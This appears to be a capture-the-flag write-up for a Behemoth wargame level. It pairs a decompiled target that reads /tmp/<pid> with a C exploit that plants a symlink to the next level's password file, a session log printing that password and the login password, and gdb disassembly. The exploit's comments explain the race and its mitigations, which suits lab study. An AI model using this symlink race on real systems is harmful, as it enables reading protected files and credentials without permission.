#include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { char fname[16]; /* $esp + 0x28 */ char chr; /* $esp + 0x24 */ FILE *fp; /* $esp + 0x20 */ pid_t pid; /* $esp + 0x1c */ pid = getpid(); sprintf(fname, "/tmp/%d", pid); fp = fopen(fname, "r"); if (fp == NULL) { puts("PID not found!"); return 0; } sleep(1); puts("Finished sleeping, fgetcing"); while (chr = fgetc(fp)) { if (chr == EOF) { fclose(fp); return 0; } putchar(chr); } fclose(fp); return 0; }
/** hacker.c */
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>

/*
 * Companion program that demonstrates why the target above must not key a
 * readable file in /tmp on its own pid.
 *
 * The parent forks; fork() hands it the child's pid before the child has
 * done anything, so the parent can place a symlink at /tmp/<child pid>
 * while the child is still in sleep(1).  The child then execs argv[1]
 * (the target), which reads /tmp/<its own pid> and prints whatever the
 * link points at.
 *
 * Mitigation on the target side: do not derive a file path from a
 * world-writable directory, or open with O_NOFOLLOW so a planted link is
 * rejected.  Linux's fs.protected_symlinks sysctl exists for this class
 * of problem in sticky world-writable directories.
 *
 * argv[1] is used without an argc check, so running with no argument
 * dereferences a NULL pointer in the child.  A failed fork() (pid < 0)
 * is silently ignored.
 */
int main(int argc, char *argv[])
{
    pid_t pid;

    pid = fork();
    if (pid > 0){
        /* Parent: pid is the child's pid, which is also the value the
         * target will get from getpid() after the exec below. */
        char cmd[64] = {0};
        snprintf(cmd, 64, "ln -sf /etc/behemoth_pass/behemoth5 /tmp/%d", pid);
        system(cmd);   /* runs ln through the shell; return value unchecked */
    } else if (pid == 0) {
        /* Child: wait for the parent to create the link, then replace
         * this process with the target.  envp is NULL, so the target
         * starts with an empty environment. */
        sleep(1);
        execle(argv[1], argv[1], NULL, NULL);
    }
    return 0;
}
root@today:~# ssh [email protected] [email protected]'s password: ietheishei behemoth4@melinda:~$ cd /tmp/shui4 behemoth4@melinda:/tmp/shui4$ ls hacker hacker.c sleep.sh behemoth4@melinda:/tmp/shui4$ gcc hacker.c -o hacker -m32 behemoth4@melinda:/tmp/shui4$ ./hacker /behemoth/behemoth4 behemoth4@melinda:/tmp/shui4$ Finished sleeping, fgetcing aizeeshing ^C
┌─────────────────────────────────────────────────────────────────────────────────┐ │0x80485dd <main> push %ebp │ │0x80485de <main+1> mov %esp,%ebp │ │0x80485e0 <main+3> and $0xfffffff0,%esp │ │0x80485e3 <main+6> sub $0x40,%esp │ │0x80485e6 <main+9> mov %gs:0x14,%eax │ │0x80485ec <main+15> mov %eax,0x3c(%esp) │ │0x80485f0 <main+19> xor %eax,%eax │ │0x80485f2 <main+21> call 0x8048460 <getpid@plt> │ │0x80485f7 <main+26> mov %eax,0x1c(%esp) │ │0x80485fb <main+30> mov 0x1c(%esp),%eax │ │0x80485ff <main+34> mov %eax,0x8(%esp) │ │0x8048603 <main+38> movl $0x8048740,0x4(%esp) │ │0x804860b <main+46> lea 0x28(%esp),%eax │ │0x804860f <main+50> mov %eax,(%esp) │ │0x8048612 <main+53> call 0x80484d0 <sprintf@plt> │ │0x8048617 <main+58> movl $0x8048748,0x4(%esp) │ │0x804861f <main+66> lea 0x28(%esp),%eax │ │0x8048623 <main+70> mov %eax,(%esp) │ │0x8048626 <main+73> call 0x80484a0 <fopen@plt> │ │0x804862b <main+78> mov %eax,0x20(%esp) │ │0x804862f <main+82> cmpl $0x0,0x20(%esp) │ │0x8048634 <main+87> jne 0x8048644 <main+103> │ │0x8048636 <main+89> movl $0x804874a,(%esp) │ │0x804863d <main+96> call 0x8048470 <puts@plt> │ │0x8048642 <main+101> jmp 0x804868d <main+176> │ │0x8048644 <main+103> movl $0x1,(%esp) │ │0x804864b <main+110> call 0x8048440 <sleep@plt> │ │0x8048650 <main+115> movl $0x8048759,(%esp) │ │0x8048657 <main+122> call 0x8048470 <puts@plt> │ │0x804865c <main+127> jmp 0x804866a <main+141> │ │0x804865e <main+129> mov 0x24(%esp),%eax │ │0x8048662 <main+133> mov %eax,(%esp) │ │0x8048665 <main+136> call 0x80484b0 <putchar@plt> │ │0x804866a <main+141> mov 0x20(%esp),%eax │ │0x804866e <main+145> mov %eax,(%esp) │ │0x8048671 <main+148> call 0x80484c0 <fgetc@plt> │ │0x8048676 <main+153> mov %eax,0x24(%esp) │ │0x804867a <main+157> cmpl $0xffffffff,0x24(%esp) │ │0x804867f <main+162> jne 0x804865e <main+129> │ │0x8048681 <main+164> mov 0x20(%esp),%eax │ │0x8048685 <main+168> mov %eax,(%esp) │ │0x8048688 <main+171> call 0x8048430 <fclose@plt> │ │0x804868d <main+176> mov $0x0,%eax 
│ │0x8048692 <main+181> mov 0x3c(%esp),%edx │ │0x8048696 <main+185> xor %gs:0x14,%edx │ │0x804869d <main+192> je 0x80486a4 <main+199> │ │0x804869f <main+194> call 0x8048450 <__stack_chk_fail@plt> │ │0x80486a4 <main+199> leave │ │0x80486a5 <main+200> ret │ └─────────────────────────────────────────────────────────────────────────────────┘